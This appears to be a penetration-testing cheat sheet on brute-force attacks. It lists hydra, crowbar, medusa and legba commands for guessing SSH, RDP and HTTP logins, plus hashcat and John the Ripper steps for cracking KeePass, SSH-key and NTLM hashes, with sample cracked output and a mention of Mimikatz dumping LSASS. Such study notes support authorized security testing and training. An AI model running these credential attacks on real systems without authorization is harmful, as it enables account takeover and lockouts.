# Brute Force Attacks ## Tools ### Hashcat Hashcat Rules: * $ : append a character * ^ : prepend a character * c : capitalize the first letter Apply rules to a wordlist: ```bash hashcat -r demo.rule --stdout demo.txt ``` Lookup a hash type code: ```bash hashcat --help | grep -i "KeePass" 13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) | Password Manager ``` ### Hash-Identifier ```bash hash-identifier > ``` ## Online Services ### SSH ```bash hydra -l username -P /path/to/password/wordlist.txt -s [port] ssh://192.168.x.x ``` ### RDP Brute forcing RDP may end up locking accounts if the security settings are configured to lock out an account on too many wrong attempts ```bash hydra -l username -P /path/to/password/wordlist.txt -s [port] rdp://192.168.x.x ``` Hydra RDP is not reliably accurate ```bash # https://github.com/galkan/crowbar crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123' ``` Impacket has a much more accurate logon check: ```bash impacket-rdp_check /:@ ``` Create a script that checks usernames and passwords given a specific domain and IP ### HTTP HTTP POST form {% code overflow="wrap" %} ```bash hydra -l user -P /path/to/password/wordlist.txt 192.168.x.x http-post-form "/index.php:fm_usr=^USER^&fm_pwd=^PASS^:Login failes. Invalid" ``` {% endcode %} HTTP basic authentication {% code overflow="wrap" %} ```bash hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/ # Use https-get mode for https medusa -h -u -P -M http -m DIR:/path/to/auth -T 10 legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/ ``` {% endcode %} ## Local Services ### KeePass Transfer the .kdbx database file to your local machine ```bash keepass2john Database.kdbx > keepass.hash ``` Remove the name of the file from the resulting hash {% code overflow="wrap" %} ```bash Database:$keepass$*2*60*0*d74e29a727e9338717d27a7d457ba3486d20dec73a9db1a7fbc7a068c9aec6bd*04b0bfd787898d8dcd4d463ee768e55337ff001ddfac98c961219d942fb0cfba*5273cc73b9584fbd843d1ee309d2ba47*1dcad0a3e50f684510c5ab14e1eecbb63671acae14a77eff9aa319b63d71ddb9*17c3ebc9c4c3535689cb9cb501284203b7c66b0ae2fbf0c2763ee920277496c1 ^ remove name $keepass$*2*60*0*d74e29a727e9338717d27a7d457ba3486d20dec73a9db1a7fbc7a068c9aec6bd*04b0bfd787898d8dcd4d463ee768e55337ff001ddfac98c961219d942fb0cfba*5273cc73b9584fbd843d1ee309d2ba47*1dcad0a3e50f684510c5ab14e1eecbb63671acae14a77eff9aa319b63d71ddb9*17c3ebc9c4c3535689cb9cb501284203b7c66b0ae2fbf0c2763ee920277496c1 ``` {% endcode %} Hashcat code for keePass is 13400 {% code overflow="wrap" %} ```bash hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --foce ``` {% endcode %} ### SSH Private Key can be found at `/home/user/.ssh/id_rsa` in order to use a private key, needs to have the following permissions applied: ```bash chmod 600 id_rsa ``` connect to ssh using a private key: ```bash ssh -i id_rsa dave@192.168.50.21 ``` retrieve hash from id\_rsa: ```bash ssh2john id_rsa > ssh.hash ``` (don't forget to remove file name from resulting hash) {% code overflow="wrap" %} ``` kali@kali:~/passwordattacks$ cat ssh.hash $sshng$6$16$7059e78a8d3764ea1e883fcdf592feb7$1894$6f70656e7373682d6b65792d7631000000000a6165733235362d6374720000000662637279707400000018000000107059e78a8d3764ea1e883fcdf592feb7000000100000000100000197000000077373682... ``` {% endcode %} In this example, the **$6$** signified SHA-512 ```bash john --wordlist=ssh.passwords ssh.hash ``` ### NTLM Cracking We cannot simple copy, rename, or move the SAM database from **C:\Windows\system32\config\sam** and we will need to use the *Mimikatz* tool to bypass this restriction. Mimikatz also includes the *sekurlsa* module which extracts password hashes from the Local Security Subsystem (LSASS) process memory. LSASS is a process in Windows that handles user authentication, password changes, and access token creation. ``` kali@kali:~/passwordattacks$ hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force hashcat (v6.2.5) starting ... 3ae8e5f0ffabb3a627672e1600f1ba10:nicole1 Session..........: hashcat Status...........: Cracked Hash.Mode........: 1000 (NTLM) Hash.Target......: 3ae8e5f0ffabb3a627672e1600f1ba10 Time.Started.....: Thu Jun 2 04:11:28 2022, (0 secs) Time.Estimated...: Thu Jun 2 04:11:28 2022, (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 17926.2 kH/s (2.27ms) @ Accel:256 Loops:77 Thr:1 Vec:8 ... ```